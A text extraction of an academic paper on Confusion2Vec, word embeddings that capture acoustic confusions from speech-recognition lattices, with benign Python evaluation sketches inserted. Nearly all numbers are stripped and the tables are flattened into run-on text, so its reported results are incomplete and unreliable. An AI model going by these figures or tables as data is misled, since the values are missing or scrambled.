pendent sensor censor straight strait gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ for robust modeling. 
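returning to the two similarity tasks defined above, both the word similarity and the acoustic similarity evaluations are scored identically: the annotated ratings are rank-correlated with the cosine similarities of the corresponding embedding pairs. a small sketch follows, assuming `scored_pairs` is a list of (word1, word2, score) tuples and `emb`/`vocab` are the hypothetical embedding matrix and vocabulary map used in the earlier sketch.

```python
import numpy as np
from scipy.stats import spearmanr

def similarity_eval(emb, vocab, scored_pairs):
    """Spearman rank correlation between annotated similarity scores and embedding
    cosine similarities; pairs with out-of-vocabulary words are pruned, mirroring
    the pruning of the evaluation sets to the in-domain vocabulary."""
    human, model = [], []
    for w1, w2, score in scored_pairs:
        if w1 in vocab and w2 in vocab:
            u, v = emb[vocab[w1]], emb[vocab[w2]]
            model.append(float(np.dot(u, v) / (np.linalg.norm(u) * np.linalg.norm(v))))
            human.append(score)
    rho, pval = spearmanr(human, model)
    return rho, pval
```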
the carnegie mellon university (cmu) pronunciation dictionary (weide, ) is pruned to corpora’s vocabulary and is used as a lexicon for the asr. a trigram language model is trained on the transcripts of the training subset data. the asr system achieves a word error rates of . % on the development and . % on the test datasets. the decoded lattice is used to generate confusion network based on minimum bayes risk criterion (xu et al., ). the asr output transcriptions resulted in a vocabulary size of , unique word tokens. confusion vec for training the confusion vec, the training subset of the fisher corpora is used. the total number of tokens resulting from the multiple paths over the confusion network is approximately . million words, that is, an average of . alternative word confusions present for each word in the confusion network. a minimum frequency threshold of is set to prune the rarely occurring tokens from the vocabulary, which resulted in the reduction of the vocabulary size from , to , . further, we also subsample the word tokens as suggested by mikolov et al. ( c) which was shown to be helpful. both the frequency thresholding and the downsampling resulted in a reduction of word tokens from . million words to approximately . million words. the confusion vec and word vec are trained using the tensorflow toolkit (abadi et al., ). negative sampling objective is used for training as suggested for better efficiency (mikolov et al., c). for the skip-gram training, the batch-size of was chosen and negative samples were used for computing the table few examples from semantic&syntactic—acoustic analogy task test set. type of relationship word pair word pair currency india rupee korea one (won) canada dollar denmark krona (krone) japan yen sweden krone (krona) family buoy (boy) girl brother sister boy girl king quean (queen) boy girl sun (son) daughter adjective-to-adverb calm calmly sloe (slow) slowly opposite aware unaware possible impassible (impossible) comparative bad worse high hire (higher) superlative bad worst grate (great) greatest present participle dance dancing rite (write) writing past tense dancing danced flying flu (flew) plural banana bananas burred (bird) birds plural verbs decrease decreases fined (find) finds multiple homophone substitutions wright (write) writes sea (see) sees rowed (road) roads i (eye) ayes (eyes) si (see) seize (sees) right (write) writes note: the words in the parenthesis are the original ones as in the analogy test set (mikolov et al., a) which have been replaced by their homophone alternatives. gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ negative sampling loss. the skip-window was set to and was trained for a total of epochs. the parameters were chosen to provide optimal performance with traditional word vec embeddings, evaluating for word analogy task, for the size of our database. during fine- tuning, the model was trained with a reduced learning rate and with other parameters unchanged. all the above parameters were fixed for consistent and fair comparison. creation of evaluation datasets acoustic analogy task we collected a list of homophones in english (http://homophonelist.com/homophones-list/ accessed: - - ), and created all possible combinations of pairs of acoustic confusion analogies. for homophones with more than two words, we list all possible confusion pairs. few examples from the dataset are listed in table . 
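the expansion of homophone groups into acoustic analogy questions can be sketched as follows; `homophone_groups` is an assumed list of identically sounding word sets (e.g., derived from the homophone list referenced above), and the generated quadruples follow the same a:b :: c:d convention as the analogy scorer sketched earlier.

```python
from itertools import combinations, permutations

def acoustic_analogy_questions(homophone_groups):
    """homophone_groups: iterable of sets of identically sounding words,
    e.g. [{"see", "sea"}, {"red", "read"}, {"right", "write", "rite"}].
    For groups with more than two words, all ordered confusion pairs are listed.
    Yields (a, b, c, d) questions meaning 'a is to b as c is to d' acoustically."""
    pair_lists = [list(permutations(sorted(group), 2)) for group in homophone_groups]
    for pairs_1, pairs_2 in combinations(pair_lists, 2):
        for a, b in pairs_1:
            for c, d in pairs_2:
                yield a, b, c, d

# e.g. ("see", "sea", "red", "read") asks for "read" given vector("sea") - vector("see") + vector("red")
```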
we emphasize that restricting the dataset to homophones makes it a strict and difficult test, since the asr lattice contains more relaxed word confusions. semantic and syntactic–acoustic analogy task we construct an analogy question test set by substituting the words in the original analogy question test set from mikolov et al. ( a) with their respective homophones. considering all five types of semantic questions and nine types of syntactic questions, any word in an analogy that has a homophone alternative is swapped with that homophone. we prune all the original analogy questions having no words with homophone alternatives. for analogies having more than one word with homophone alternatives, we list all permutations. the number of questions generated by this method, being exhaustive, was large, and hence we randomly sample from the list to retain a subset of semantic and syntactic questions. table lists a few examples with single and multiple homophone substitutions for the semantic and syntactic–acoustic analogy task from our data set. acoustic similarity task to create a set of word pairs scored by their acoustic similarity, we add all the homophone word pairs with an acoustic similarity score of 1.0.

table examples of acoustic similarity ratings (word pair, acoustic rating, wordsim rating): i & eye; adolescence & adolescents; allusion & illusion; sewer & sower; fighting & defeating; day & dawn; weather & forecast. notes: acoustic rating: 1.0 = identically sounding, 0.0 = highly acoustically dissimilar; wordsim ratings range from low to high word similarity; word pairs not present in wordsim are denoted by "–" (the first four pairs above are not in wordsim).

to get a more diverse range of acoustic similarity scores, we also utilize all the word pairs from the wordsim- dataset
moreover, while jointly modeling two orthogonal information streams (i) contextual co-occurrences, and (ii) acoustic word confusions, finding the nearest word vector nearest to the specific analogy is no longer an optimal evaluation strategy. this is because the word vector nearest to the analogy operation can either be along the contextual axis or the confusion axis, that is, each analogy could possibly have two correct answers. for example, the analogy “write”–“wrote”: “read” can be right when the nearest word vector is either “read” (contextual dimension) or “red” (confusion dimension). to incorporate this, we provide the accuracy over top- nearest vectors, that is, we count the analogy question as correct if any of the top- nearest vectors satisfies the analogy. this also holds for the acoustic confusion analogy tasks, especially for relations involving triplet homophones. for example, the analogy “write”-“right”: “road” can be right when the nearest word vector is either “rode” or “rowed” (for triplet homophones “road”/“rode”/“rowed”). thus, we present evaluations by comparing the top- (nearest vector) evaluation with baseline word vec against the top- evaluation for the proposed confusion vec models. to maintain consistency, we also provide the top- evaluations for the baseline word vec models in the appendix. moreover, since we have three different analogy tasks, we provide the average accuracy among the three tasks in order to have an easy assessment of the performance of various proposed models. results table lists the results for various models. we provide evaluations on three different analogy tasks and two similarity tasks as discussed in the section “evaluation methods.” further, more thorough results with the semantic and syntactic accuracy splits are provided under the appendix to gain deeper insights. gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ baseline word vec model we consider two variations of word vec baseline model. first, we provide results with the google’s word vec model (https://code.google.com/archive/p/word vec) which is trained with orders more training data, and is thus a high upper bound on the semantic and syntactic task. the google’s word vec model was pruned to match the vocabulary of our corpora to make the evaluation comparable. second, we consider the word vec model trained on the in-domain ground truth transcripts. the two baseline models result in good performance on semantic&syntactic analogy tasks and word similarity task as expected. the google’s model achieves an accuracy of . % on the semantic&syntactic analogy task. we note that the syntactic accuracy ( . %) is much higher than the semantic accuracy ( . %) (see table a ). this could be due to our pruned evaluation test set (see table ). the in-domain model improves on the semantic accuracy while losing on the syntactic accuracy over the google model (see table a ). the shortcomings of the in- domain model compared to the google word vec on the semantic&syntactic analogy task can be attributed toward the amount of training data and its extensive vocabulary. the in-domain model is trained on . million words vs. the billion of google’s news dataset. moreover, the vocabulary size of in-domain models is approximately , vs. the three million of google (mikolov et al., c) and thus unfair to compare with the rest of the models. 
further, evaluating the acoustic analogy and semantic&syntactic–acoustic analogy tasks, all the baseline models perform poorly. an unusual thing we note is that the google word vec model performs better comparatively to the in-domain baseline model in the semantic&syntactic–acoustic analogy task. a deeper examination revealed that the model compensates well for homophone substitutions on semantic&syntactic analogies which have very similar spellings. this suggests that the typographical errors present in the training data of the google model results in a small peak in performance for the semantic&syntactic–acoustic analogy task. on the evaluations of similarity tasks, all the baseline models perform well on the word similarity tasks as expected. however, they exhibit poor results on the acoustic similarity task. overall, the results indicate that the baseline models are largely inept of capturing any relationships over the acoustic word confusions present in a confusion network or a lattice. in our specific case, the baseline models are poor in capturing relationships between acoustically similar words. top-confusion—c v- comparing the top-confusion (c v- for short), training scheme with the baseline in-domain word vec model, we observe the baseline model trained on clean data table statistics of evaluation datasets. task total samples retained samples semantic&syntactic analogy , , acoustic analogy , , semantic&syntactic–acoustic analogy , , wordsim- acoustic confusion ratings , gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / https://code.google.com/archive/p/word vec http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ performs better on the semantic&syntactic analogy task as expected. baseline in-domain word vec achieves . % on the semantic&syntactic analogy task whereas the top-confusion model achieves . % (see table a ). however, the performance difference is minimal. this is encouraging because the top-confusion model is trained on the noisy asr transcripts. moreover, we see the noisy transcripts negatively affect the semantic accuracies while the syntactic accuracy remains identical which makes sense (see table a ). similar to the baseline in-domain word vec model, the top-confusion model falls short to google word vec mainly due to the extensive amount of data employed in the latter case. evaluating for acoustic analogies and semantic&syntactic–acoustic analogies, the top-confusion scheme improves slightly over the baseline word vec model. this hints at the ability of the top-confusion model to capture some acoustic word confusions through context (e.g., “take a seat” is expected but sometimes we may see “take a sit”). the improvements are small because in a good quality asr the top confusion network hypotheses contain few errors thus context learning is much stronger and acoustic- confusion learning is minimal. note that the top-confusion model would converge to the baseline word vec model in the case of a zero word error rate. further, inspecting the performance in the similarity task, the top-confusion model exhibits statistically significant positive correlation in the word similarity task, although slightly smaller correlation than the baseline word vec and google word vec model. however, we observe a positive (statistically significant) correlation on the acoustic similarity task, whereas both the baseline word vec and google word vec model exhibit a negative correlation. 
this further validates the proposed top-confusion model’s capability to capture acoustic word confusions. intra-confusion, c v-a with intra-confusion training (c v-acoustic or c v-a for short) we expect the model to capture acoustically similar word relationships, while completely ignoring any table results: different proposed models. model analogy tasks similarity tasks s&s (%) acoustic (%) s&s–acoustic (%) average accuracy (%) word similarity acoustic similarity google w v . . . . . - . in-domain w v . . . . . - . c v- . . . . . . c v-a . . . . . * . c v-c . . . . . . c v-* . . . . . * . notes: c v- , top-confusion; c v-a, intra-confusion; c v-c, inter-confusion; c v-*, hybrid intra-inter; s&s, semantic & syntactic analogy. all the models are of dimensions except google’s w v which is dimensions. for the analogy tasks: the accuracies of baseline word vec models are for top- evaluations, whereas of the other models are for top- evaluations (as discussed in the section “analogy tasks”). detailed semantic analogy and syntactic analogy accuracies, the top- evaluations and top- evaluations for all the models are available under appendix in table a . for the similarity tasks: all the correlations (spearman’s) are statistically significant with p < . except the ones with the asterisks. detailed p- values for the correlations are presented under appendix in table a . bold entries correspond to the best results in their respective tasks. gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ contextual relations. hence, we expect the model to perform well on acoustic analogies and acoustic similarity tasks and to perform poorly on semantic&syntactic analogies and word similarity tasks. the table lists the results obtained using intra-confusion training. the results are in conjunction with our expectations. the model gives the worst results in semantic&syntactic analogy task. however, we observe that the syntactic analogy accuracy to be a fair amount higher than the semantic accuracy (see table a ). we think this is mainly because of syntactically similar words appearing along the word confusion dimension in the confusion networks, resultant of the constraints enforced on the confusion network by the (asr) language model—which are known to perform better for syntactic tasks (mikolov et al., a). the model also gives the highest correlation on the acoustic similarity task, while performing poorly on the word similarity task. inter-confusion, c v-c with inter-confusion training (c v-contextual or c v-c for short), we hypothesized that the model is capable of jointly modeling both the contextual information as well as confusions appearing contextually. hence, we expect the model to perform well on both the semantic&syntactic analogy and acoustic analogy tasks and in doing so result in better performance with semantic&syntactic–acoustic analogy task. we also expect the model to give high correlations for both word similarity and acoustic similarity tasks. from table , we observe that as hypothesized the inter-confusion training shows improvements in the semantic&syntactic analogy task. quite surprisingly, the inter-confusion training shows better performance than the intra-confusion training for the acoustic analogy task, hinting that having good contextual representation could mutually be beneficial for the confusion representation. 
however, we don’t observe any improvements in the semantic&syntactic–acoustic analogy task. evaluating on the similarity tasks, the results support the observations drawn from analogy tasks, that is, the model fares relatively well in both word similarity and acoustic similarity. hybrid intra–inter confusion, c v-� the hybrid intra–inter confusion training (c v-� for short) introduces all confusability and allows learning directly confusable acoustic terms, such as in the c v-a case, and contextual information that incorporates confusable terms, as in the inter or c v-c case. this model shows comparable performance in jointly modeling on both the semantic&syntactic and acoustic analogy tasks. one crucial observation is that it gives significantly better performance with the semantic&syntactic–acoustic analogy task. this suggests that jointly modeling both the intra-confusion and inter-confusion word mappings is useful. however, it achieves better results by compromising on the semantic analogy (see table a ) accuracy and hence also negatively affecting the word similarity task. the model achieves good correlation on the acoustic similarity task. overall, our proposed confusion vec models capture significantly more useful information compared to the baseline models judging by the average accuracy over the analogy tasks. one particular observation we see across all the proposed models is that the performance remains fairly poor for the semantic&syntactic–acoustic analogy task. gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ this suggests that the semantic&syntactic–acoustic analogy task is inherently hard to solve. we believe that to achieve better results with semantic&syntactic–acoustic analogies, it is necessary to have a robust performance on one of the tasks (semantic&syntactic analogies or acoustic analogies) to begin with, that is, better model initialization could help. next, we experiment with model initializations/pre-training. model initialization/pre-training table lists the results with model initialization/pre-training. the in-domain word vec baseline model and the top-confusion models are initialized from the google word vec model. pre-training the models provide improvements with semantic&syntactic analogy results to be close and comparable to that of the google’s word vec model. empirically, we find the top-confusion model inherits approximately similar contextual information as the baseline models, and in addition outperforms the baseline in average accuracy. thus, for future experiments we adopt the top-confusion model (rather than word vec model) for initialization, model concatenation, and joint-training. the remaining models (c v-a, c v-c, and c v-�) are initialized from the top-confusion model (i.e., c v- , the top-confusion model initialized from google word vec), since this would enable full compatibility with the vocabulary. since the google word vec model is dimensional, this forces all the pre- trained models (table ) to be , as opposed to dimensions (table ). for intra-confusion model, the pre-training provides drastic improvements on semantic&syntactic analogy task at the expense of the acoustic analogy task. even-though the accuracy of acoustic analogy task decreases comparatively to without pre-training, it remains significantly better than the baseline model. more importantly, the semantic&syntactic–acoustic analogy task accuracy doubles. 
inter-confusion model does not compromise on the semantic&syntactic analogy tasks, in doing so gives comparable performances to the baseline model. additionally, it also does well on the acoustic table results with pre-training/initialization. model analogy tasks similarity tasks s&s (%) acoustic (%) s&s–acoustic (%) average accuracy (%) word similarity acoustic similarity google w v . . . . . - . in-domain w v . . . . . - . c v- . . . . . - . c v-a . . . . . . c v-c . . . . . . c v-* . . . . . . notes: c v- , top-confusion; c v-a, intra-confusion; c v-c, inter-confusion; c v-*, hybrid intra-inter; s&s, semantic & syntactic analogy. all the models are of dimensions. for the analogy tasks: the accuracies of baseline word vec models are for top- evaluations, whereas of the other models are for top- evaluations (as discussed in the section “analogy tasks”). detailed semantic analogy and syntactic analogy accuracies, the top- evaluations and top- evaluations for all the models are available under appendix in table a . for the similarity tasks: all the correlations (spearman’s) are statistically significant. detailed p-values for the correlations are presented under appendix in table a . bold entries correspond to the best results in their respective tasks. gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ and semantic&syntactic–acoustic analogy task as was the case without pre-training. in the case of hybrid intra-inter confusion model, similar trends are observed as was with no pre-training, but with considerable improvements in accuracies. pre-training also helps in boosting the correlations for the word similarity tasks for all the models. overall, we find the pre-training to be extremely useful. model concatenation table (rows - ) lists the results with model concatenation. we concatenate each of the proposed models (table ) with the pre-trained top-confusion model (we use c v- model instead of word vec as hypothesized in fig. b because empirically c v- model provided similar performance on semantic&syntactic tasks and overall better average accuracy on analogy tasks compared to the baseline-in-domain w v model). thus the resulting vector space is dimensional ( (pre-trained top-confusion model) + (proposed models from table )). in our case, we believe the dimension expansion of the vector space is insignificant in terms of performance considering the relatively low amount of training data compared to google’s word vec model. to be completely fair in judgment, we create a new baseline model with dimensional embedding space for comparison. to train the new baseline model, the dimension embedding was initialized with dimensional google’s word vec embedding and the rest of the dimensions as zeros (null space). comparing the dimension baseline from table with the previous dimensional baseline from table , the results are almost identical which confirms the dimension expansion is insignificant with respect to performance. with model concatenation, we see slightly better results (average analogy accuracy) comparing with the pre-trained models from table , an absolute increase of up-to approximately % among the best results. the correlations with similarity tasks are similar and comparable with the earlier results with the pre-trained models. 
joint optimization fixed contextual subspace rows – of table display the results of joint optimization with concatenated, fixed top-confusion (c v- ) embeddings and learn-able confusion vec (c v-a/c/�) embeddings. as hypothesized with fixed subspace, the results indicate better accuracies for the semantic&syntactic analogy task. thereby, the improvements also reflect on the overall average accuracy of the analogy tasks. this also confirms the need for joint optimization which boosts the average accuracy up-to approximately % absolute over the unoptimized concatenated model. unrestricted optimization the last nine rows of table display the results obtained by jointly optimizing the concatenated models without constraints. both the subspaces are fine tuned to convergence with various proposed training criteria. we consistently observe improvements with the unrestricted optimization over the unoptimized model concatenations. in terms of average accuracy we observe an increase in average accuracy by up-to % (absolute) approximate over the unoptimized concatenated models. moreover, we obtain gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ improvements over the fixed contextual subspace joint-optimized models, up-to – % (absolute) in average accuracies. the best overall model in terms of average accuracies is obtained by unrestricted joint optimization on the concatenated top-confusion and inter-confusion models by fine-tuning with the intra-confusion training scheme. results summary firstly, comparing among the different training schemes (see table ), the inter-confusion training consistently gives the best acoustic analogy accuracies, whereas the hybrid table model concatenation and joint optimization results. model fine-tuning scheme analogy tasks similarity tasks s&s acoustic s&s–acoustic average word acoustic google w v – . % . % . % . % . - . in-domain w v ( dim.) – . % . % . % . % . - . model concatenation c v- (f) + c v-a (f) – . % . % . % . % . . c v- (f) + inter-confusion (f) – . % . % . % . % . . c v- (f) + hybrid intra-inter (f) – . % . % . % . % . . fixed contextual subspace joint optimization c v- (f) + c v-a (l) inter . % . % . % . % . . c v- (f) + c v-a (l) intra . % . % . % . % . . c v- (f) + c v-a (l) hybrid . % . % . % . % . . c v- (f) + c v-c (l) inter . % . % . % . % . . c v- (f) + c v-c (l) intra . % . % . % . % . . c v- (f) + c v-c (l) hybrid . % . % . % . % . . c v- (f) + c v-* (l) inter . % . % . % . % . . c v- (f) + c v-* (l) intra . % . % . % . % . . c v- (f) + c v-* (l) hybrid . % . % . % . % . . unrestricted joint optimization c v- (l) + c v-a (l) inter . % . % . % . % . . c v- (l) + c v-a (l) intra . % . % . % . % . . c v- (l) + c v-a (l) hybrid . % . % . % . % . * . c v- (l) + c v-c (l) inter . % . % . % . % . . c v- (l) + c v-c (l) intra . % . % . % . % . . c v- (l) + c v-c (l) hybrid . % . % . % . % . . c v- (l) + c v-* (l) inter . % . % . % . % . . c v- (l) + c v-* (l) intra . % . % . % . % . . c v- (l) + c v-* (l) hybrid . % . % . % . % . . notes: c v- , top-confusion; c v-a, intra-confusion; c v-c, inter-confusion; c v-*, hybrid intra-inter. all the models are of ( + ) dimensions. acronyms: (f):fixed embedding, (l):learn embedding during joint training, s&s: semantic & syntactic analogy. 
for the analogy tasks: the accuracies of baseline word vec models are for top- evaluations, whereas of the other models are for top- evaluations (as discussed in the section “analogy tasks”). detailed semantic analogy and syntactic analogy accuracies, the top- evaluations and top- evaluations for all the models are available under appendix in table a . for the similarity tasks: all the correlations (spearman’s) are statistically significant with p < . except the ones with the asterisks. detailed p-values for the correlations are presented under appendix in table a . bold entries correspond to the best results in their respective tasks. gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ training scheme often gives the best semantic&syntactic–acoustic analogy accuracies. as far as the semantic&syntactic analogy task is concerned, the intra-confusion is often found to give preference to syntactic relations, while the inter-confusion boosts the semantic relations and the hybrid scheme balances both relations (see table a ). next, pre-training/initializing the model gives drastic improvements in overall average accuracy of analogy tasks. concatenating the top-confusion model with the confusion vec (c v-a/c/�) model gives slightly better results. more optimizations and fine-tuning over the concatenated model gives considerably the best results. overall, the best results are obtained with unrestricted joint optimization of top- confusion and inter-confusion model, that is, fine-tuning using intra-confusion training mode. in terms of average analogy accuracies the confusion vec model (c v-a/c/�) outperforms the baseline by up-to . %. the best performing confusion vec model outperforms the word vec model even on the semantic&syntactic analogy tasks (by a relative . %). moreover, even the comparison between the top- evaluations of both the word vec and confusion vec (c v- /a/c/�) suggests very similar performance on semantic&syntactic-analogy tasks (see table a ). this confirms and emphasizes that the confusion vec (c v- /a/c/�) doesn’t compromise on the information captured by word vec but succeeds in augmenting the space with word confusions. another highlight observation is that modeling the word confusions boost the semantic and syntactic scores of the semantic&syntactic analogy task (compared to word vec), suggesting inherent information in word confusions which could be exploited for better semantic-syntactic word relation modeling. vector space analysis in this section, we compare the vector space plots of the typical word vec space and the proposed confusion vec vector space for a specifically chosen set of words. we choose a subset of words representing three categories to reflect semantic relationships, syntactic relationships and acoustic relationships. the vector space representations of the words are then subjected to dimension reduction using principle component analysis (pca) to obtain d vectors which are used for plotting. semantic relationships for analyzing the semantic relationships, we compile random word pairs (constrained by the availability of these in our training data) representing country–cities relationships. the d plot for baseline pre-trained word vec model is shown in fig. and for the proposed confusion vec model, specifically for the randomly selected, jointly-optimized top-confusion + intra-confusion model (corresponding to row in table ) is displayed in fig. . 
the following observations can be made comparing the two pca plots: � examining the baseline word vec model, we find the cities are clustered over the upper half of the plot (highlighted with blue hue in fig. ) and countries are clustered together at the bottom half (highlighted with red hue in fig. ). gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � similar trends are observed with the proposed confusion vec model, where the cities are clustered together over the right half of the plot (highlighted with blue hue in fig. ) and the countries are grouped together toward the left half (highlighted with red hue in fig. ). � in the word vec space, the vectors of country–city word pairs are roughly parallel, pointing north-east (i.e., vectors are approximately similar). � similar to the word vec space, with the confusion vec, we observe the vectors of country–city word pairs are fairly parallel and point to the east (i.e., vectors are highly similar).the four observations indicate that the confusion vec preserves the semantic relationships between the words (similar to the word vec space). syntactic relationships to analyze the syntactic relationships, we create pairs of words composed of adjective- adverb, opposites, comparative, superlative, present-participle, past-tense, plurals. the pca d plots for baseline pre-trained word vec model and the proposed confusion vec model are illustrated in figs. and , respectively. the following inferences can be made from the two plots: � inspecting the baseline word vec model, we observe that the word pairs depicting syntactic relations occur often close-by (highlighted with red ellipses in fig. ). � few semantic relations are also apparent and are highlighted with blue ellipses in fig. . for example, animals are clustered together. � similarly, with the confusion vec model, we observe syntactic clusters of words highlighted with red ellipses in fig. . � semantic relations apparent in the case of word vec is also evident with the confusion vec, which are highlighted with blue ellipses in fig. . � additionally, with the confusion vec model, we find clusters of acoustically similar words (with similar phonetic transcriptions). these are highlighted using a green ellipse in fig. . the above findings confirm that the confusion vec models preserve the syntactic relationships similar to word vec models, supporting our hypothesis. acoustic relationships in order to analyze the relationships of similar sounding words in the word vector spaces under consideration, we compose pairs of acoustically similar sounding words, with similar phonetic transcriptions. the d plot obtained after pca for the baseline word vec model is shown in fig. and the proposed confusion vec model is shown in fig. . we make the following observations from the two figures: � observing the baseline word vec model, no apparent trends are found between the acoustically similar words. for example, there is no trivial relationships apparent from the plot in fig. between the word “no” and “know,” “try” and “tri,” etc. gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ word vec relationships of countries-cities figure d plot after pca of word vector representation on baseline pre-trained word vecf. demonstration of semantic relationship on randomly chosen pairs of countries and cities. 
country-city vectors are almost parallel/similar; countries are clustered together on the bottom half (highlighted with red hue) and the cities on the upper half (highlighted with blue hue).

figure: 2-d plot after pca of the word vector representation of the jointly optimized pre-trained c v- + c v-a model, demonstrating the semantic relationship on randomly chosen pairs of countries and cities. the semantic relationships are preserved as in the word vec model: country-city vectors are almost parallel/similar, countries are clustered together on the left half (highlighted with red hue) and the cities on the right half (highlighted with blue hue).

figure: 2-d plot after pca of the word vector representation of the baseline pre-trained word vec model, demonstrating syntactic relationships on randomly chosen pairs of adjective-adverb, opposites, comparatives, superlatives, present participles, past tenses, and plurals. syntactically related words cluster together (highlighted with red ellipses), and a few semantically related words (e.g., animals) are highlighted with blue ellipses.

figure: 2-d plot after pca of the word vector representation of the jointly optimized pre-trained c v- + c v-a model for the same syntactic pairs. syntactic clustering is preserved by confusion vec similar to word vec (red ellipses), semantically related words (e.g., animals) are also clustered together (blue ellipses), and, additionally, confusion vec clusters acoustically similar words together (green ellipse).

figure: 2-d plot after pca of the word vector representation of the baseline pre-trained word vec model on randomly chosen pairs of acoustically similar sounding words; no apparent relations between acoustically similar words are evident.
figure: 2-d plot after pca of the word vector representation of the jointly optimized pre-trained c v- + c v-a model on randomly chosen pairs of acoustically similar sounding words. confusion vec clusters acoustically similar words together (highlighted with blue ellipses); additionally, inter-relations between syntactically related words and acoustically related words are also evident (highlighted with a green ellipse).

� however, inspecting the proposed confusion vec model, an obvious trend is apparent: the acoustically similar words are grouped together in pairs and occur at roughly similar distances. the word pairs are highlighted with blue ellipses in fig. . � additionally, in fig. , as highlighted with a green ellipse, we observe that the four words "no," "not," "knot," and "know" occur in close proximity. the word pair "no" and "not" portrays a semantic/syntactic relation, whereas the pairs "knot" & "not" and "no" & "know" are acoustically related. the above findings suggest that the word vec baseline model fails to capture any acoustic relationships, whereas the proposed confusion vec successfully models the confusions present in the lattices, in our specific case the acoustic confusions from the asr lattices. discussion in this section, we demonstrate, with the support of toy examples, why the proposed embedding space is superior for modeling word lattices. consider a simple task of asr error correction. as shown by allauzen ( ), ogata & goto ( ) and shivakumar et al. ( ), the information needed to correct the errors is often embedded in the lattices. the toy examples in figs. a and b depict real scenarios encountered in asr. the lattice feature representation is a weighted vector sum of all the words in the confusion and its context present in the lattice (see fig. ). we compare the proposed confusion vec embeddings with the popular word vec using cosine similarity as the evaluation measure. table lists the evaluation for the following cases: (i) the asr output is correct, (ii) the asr output is wrong and the correct candidate is present in the lattice, (iii) the asr output is wrong and the correct candidate is absent from the lattice, and (iv) the asr output is wrong and no lattice is available. the following observations are drawn from the results: ( ) confusion vec shows higher similarity with the correct answers when the asr output is correct (see table ; examples . , . ). ( ) confusion vec exhibits higher similarity with the correct answers when the asr output is wrong, meaning the representation is closer to the correct candidate and therefore more likely to correct the errors (see table ; examples . , . , . , . ). ( ) confusion vec yields high similarity even when the correct word candidate is not present in the lattice, meaning confusion vec leverages its inherent word representation knowledge to aid the re-introduction of pruned or unseen words during error correction (see table ; examples . , . , . ). ( ) confusion vec shows low similarity in the case of fake lattices with highly unlikely word alternatives (see table ; examples . , . ).
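the weighted lattice feature vector used in these comparisons is straightforward to compute once the confusion network posteriors are available. the sketch below is illustrative rather than the authors' implementation: `confusion_net` is an assumed list of time slots, each holding (word, posterior) pairs, `emb`/`vocab` are the hypothetical embedding matrix and vocabulary map from the earlier sketches, and the posteriors in the usage comment are made-up stand-ins for the weights in the toy examples.

```python
import numpy as np

def cosine(u, v):
    return float(np.dot(u, v) / (np.linalg.norm(u) * np.linalg.norm(v)))

def lattice_feature(confusion_net, emb, vocab):
    """Posterior-weighted sum of the word vectors of every word in every slot
    of a confusion network, yielding a single fixed-size lattice representation."""
    feat = np.zeros(emb.shape[1], dtype=emb.dtype)
    for slot in confusion_net:
        for word, posterior in slot:
            feat += posterior * emb[vocab[word]]
    return feat

# ground truth vs. an ambiguous ASR confusion network (illustrative posteriors):
# truth = lattice_feature([[("yes", 1.0)], [("right", 1.0)], [("answer", 1.0)]], emb, vocab)
# hyp   = lattice_feature([[("yes", 1.0)], [("right", 0.5), ("write", 0.5)], [("answer", 1.0)]], emb, vocab)
# cosine(truth, hyp) is expected to be higher under confusion vec than under word vec.
```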
all the above observations are supportive of the proposed confusion vec word representation and is in line with the expectations for the task of asr error correction. gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ potential applications in addition to the above discussed asr error correction task, other potential applications include: machine translation: in machine translation, word lattices are used to provide multiple sources for generating a single translation (schroeder, cohn & koehn, ; dyer, ). word lattices derived from reordered hypotheses yes:yes/ write:write/ . right:right/ . answer:answer/ (a) example she:she/ . shea:shea/ . likes:likes/ sea:sea/ . see:see/ . (b) example figure confusion network examples. full-size doi: . /peerj-cs. /fig- w t, w t, w t, c(t) p(w t, ))) p(w t, ) p(w t, ) w t- , w t- , w t- , c(t- ) p(w t- , ) p(w t- , ) p))p(w t- , ) w t+ , w t+ , w t+ , c(t+ ) p(w t+ , )))p(w t+ , )) p(w t+ , ) sum feature vector figure computation of lattice feature vector. full-size doi: . /peerj-cs. /fig- table cosine similarity between the asr ground-truth and asr output in application to asr error correction for baseline pre-trained word vec and the proposed confusion vec: jointly optimized intra-confusion + top-confusion models. example ground-truth asr output w v similarity c v similarity . “yes right answer” “yes (right/write) answer” . . . “yes right answer” “yes write answer” . . . “yes write answer” “yes (right/write) answer” . . . “yes rite answer” “yes (right/write) answer” . . . “yes rite answer” “yes right answer” . . . “yes rite answer” “yes write answer” . . . “she likes sea” “(she/shea) likes (see/sea)” . . . “she likes sea” “shea likes see” . . . “shea likes see” “(she/shea) likes (see/sea)” . . . “shea likes see” “(she/shea) likes (see/rocket)” . . . “she likes sea” “(she/shea) likes (see/rocket)” . . note: examples . – . inherits structure as in fig. a, that is, “yes (right/write) answer” assigns weight of . to yes and answer, . to right, . to write. similarly examples . – . inherits structure as in fig. b. gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. 